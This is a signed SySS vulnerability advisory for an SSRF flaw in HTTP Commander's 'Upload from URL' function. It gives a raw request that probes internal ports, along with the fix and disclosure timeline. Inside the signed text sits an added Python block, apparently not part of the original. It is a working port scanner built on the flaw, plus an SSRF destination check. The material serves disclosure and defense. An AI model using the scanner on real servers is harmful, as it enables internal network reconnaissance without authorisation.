-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-027
Product: HTTP Commander
Manufacturer: Element-IT Software
Affected Version(s): < 5.3.3.2020.11.16
Tested Version(s): 5.3.3.2020.11.16
Vulnerability Type: Server-Side Request Forgery (CWE-918)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2021-05-05
Solution Date: 2021-05-13
Public Disclosure: 2021-07-14
CVE Reference: CVE-2021-33213
Author of Advisory: Tobias Jäger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

HTTP Commander is a web-based file manager.

The manufacturer describes the product as follows (see [1]):

"This software is intended for fast and easy integration of web site
functionality with sharing and management of files and documents on a
Windows server through a web browser over net. It's a web server-based
file sharing and management solution – the best alternative to FTP,
WebDav, Sharepoint, etc."

Due to missing validation of user-supplied URLs, the server is prone to
server-side request forgery.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The function "Upload from URL" is vulnerable to server-side request
forgery. HTTP and FTP resources can be requested on behalf of the
server, so resources on the internal network or on the loopback
interface of the server itself can be reached. Besides access to
internal resources, a port scan can also be performed, because the
error message returned by the function differs depending on whether the
target port accepts the connection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Download internal files:

Open the function "Upload" --> "From URL" and enter a URL. The server
downloads the web page or file via HTTP or FTP into the selected folder
(e.g. http://filer.internal/secret-passwordfile.txt), where it can then
be read by the user who issued the upload.

Port scan:

To check whether port 445 of the server is open, one can send the
following request:

POST /HTCOMNET/Handlers/UploadFromURLHandler.ashx HTTP/1.1
Host: 10.40.1.9
[...]

{"action":"UploadFromURL","method":"Upload","data":[{"url":"http://127.0.0.1:445","path":"Demo folder 1","name":"test","rename":true}],"type":"rpc","tid":4}

If port 445 is open, the resulting error reads:

"The underlying connection was closed: An unexpected error occurred on
a receive."

If port 445 is closed, the resulting error reads:

"Unable to connect to the remote server."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 5.3.5.

The "Upload from URL" function can be disabled in the administrator
panel. Deactivate the function if it is not needed. In new
installations it is disabled by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-04-07: Vulnerability discovered
2021-05-05: Vulnerability reported to manufacturer
2021-05-13: Patch released by manufacturer
2021-07-14: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for HTTP Commander
    https://www.element-it.com/asp-net-explorer-browser/online-share/web-file-manager.aspx
[2] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Tobias Jäger of SySS GmbH.

E-Mail: tobias.jaeger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc
Key ID: 0xABF0CF2F4D0220F9
Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
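The port-scan oracle from the PoC above, together with the destination check a fixed "Upload from URL" handler would need to perform, as an added Python example. This is not code from the SySS advisory, from Element-IT or from HTTP Commander. The handler path, the RPC body and the two error strings are taken from the advisory; the Content-Type header, the need for a session cookie, the host names and the mitigation logic are assumptions made for this example.

```python
"""SSRF port-scan oracle and destination check for "Upload from URL".

Added example, not code from SySS GmbH or Element-IT. The handler path,
RPC body and error strings come from advisory SYSS-2021-027; everything
else (headers, cookie, hosts, mitigation) is assumed for illustration.
"""
import http.client
import ipaddress
import json
import socket
from urllib.parse import urlsplit

HANDLER_PATH = "/HTCOMNET/Handlers/UploadFromURLHandler.ashx"

# The two error messages the advisory reports for open vs. closed ports.
OPEN_PORT_ERROR = ("The underlying connection was closed: "
                   "An unexpected error occurred on a receive.")
CLOSED_PORT_ERROR = "Unable to connect to the remote server."


def build_probe(target_host, target_port, folder="Demo folder 1", tid=4):
    """Return the RPC body that makes the server connect to host:port.

    Mirrors the PoC request; folder name and tid are placeholders.
    """
    return json.dumps({
        "action": "UploadFromURL",
        "method": "Upload",
        "data": [{"url": f"http://{target_host}:{target_port}",
                  "path": folder, "name": "test", "rename": True}],
        "type": "rpc",
        "tid": tid,
    })


def classify_response(body):
    """Map the server's error text to a port state.

    Only the two messages quoted in the advisory are recognised. Anything
    else (timeouts, a service that actually speaks HTTP and makes the
    upload succeed, other exceptions) is reported as 'unknown' rather
    than guessed.
    """
    if OPEN_PORT_ERROR in body:
        return "open"
    if CLOSED_PORT_ERROR in body:
        return "closed"
    return "unknown"


def scan_ports(target_host, ports, send):
    """Probe each port through the server and return {port: state}.

    send(body) must POST the RPC body to the handler and return the
    response text; http_sender() builds one for a real instance, and a
    stub can be passed for offline use.
    """
    return {port: classify_response(send(build_probe(target_host, port)))
            for port in ports}


def http_sender(commander_host, cookie=None):
    """Return a send(body) callable for a live HTTP Commander instance.

    Assumes a JSON Content-Type and that the function requires a logged-in
    session, passed as the browser's Cookie header value. Not exercised
    offline.
    """
    def send(body):
        conn = http.client.HTTPConnection(commander_host, timeout=15)
        headers = {"Content-Type": "application/json"}  # assumed
        if cookie:
            headers["Cookie"] = cookie
        conn.request("POST", HANDLER_PATH, body=body, headers=headers)
        text = conn.getresponse().read().decode("utf-8", "replace")
        conn.close()
        return text
    return send


def destination_allowed(url, resolver=socket.getaddrinfo):
    """Server-side check a fixed handler should run before fetching a URL.

    Illustrative mitigation, not the vendor's patch: allow only http(s),
    and refuse any destination whose address is not globally routable
    (loopback, RFC 1918, link-local, IPv6 ULA, ...). A real fix must also
    connect to the address it validated instead of re-resolving the name,
    or DNS rebinding defeats the check.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]
    except ValueError:  # a hostname, not an IP literal: resolve it
        try:
            infos = resolver(parts.hostname, parts.port or 80,
                             proto=socket.IPPROTO_TCP)
        except (socket.gaierror, ValueError):
            return False
        addrs = [ipaddress.ip_address(info[4][0]) for info in infos]
    return bool(addrs) and all(addr.is_global for addr in addrs)
```

Against a live target, `scan_ports("127.0.0.1", [445, 3389, 8080], http_sender("10.40.1.9", cookie="..."))` reproduces the PoC for several ports in one go; `destination_allowed()` is the kind of check whose absence the advisory describes, and it also rejects the FTP scheme the vulnerable function accepted.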
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmDtVAEACgkQq/DPL00C
IPn3zQ//ZNCkuvND5BASwKEkRHooYSU6/wiQn8cGwLZFhnr0XH0PKfsKcq24vO+c
FXHDSOp5azCrFl/xONP0D1ELudZpMtXcroy3pJWSOPhwubeAFxkRb6rZuAJCVO/2
ezLxEd2wrkQ+6/FH+lGrn+/Q+j5/i2ooJ/e+FRwQhODtFDsEmGKxkvN8f+LyCwgC
VBW+x1OTY/xM+aJaDcIpYXGz5yiAR2OICKXyZxzGJhiG141Q4bJp6t6a57pwxH5s
i/wRM7L034232W4hb1VMZqRTprYMDNFHN8JgqzXcXWoOd+OOPLO0RjQ5J/ys2zW6
9A5RNmSPket5H/QYT1JDQ0miplPk/MnJo1u49l0cc4wBgzcpXFhr/7U9nQGBhiPV
L7frx2mNLaIDWqXjsq6b+4nCyn9LYR6aB+/xbwQ/xVpoqEXF6gtR3RgBS6UP79oM
uuGgXF5FR6tc+dpVtHBenrkiqPhABOniamfaSE1tyMrGLGydJqgJxE4IkJ74/5bl
ZwCaYaiqaTLvQFWqC/NvZpp8xjtlwTqMy1FKna36iBSZsKMKoRrGqIW2Y/CK/1dS
gzgQ60m+SNVbM4pHN86MI2r9wsUfy7NshUVrv3lh1mLrWR+dlVDAj+my0Sj+1cXj
ngezANB1Pvlb2oWOF8H4fjBq17M485W8Tnp9DgJZuIeaiG2t34g=
=Jcq3
-----END PGP SIGNATURE-----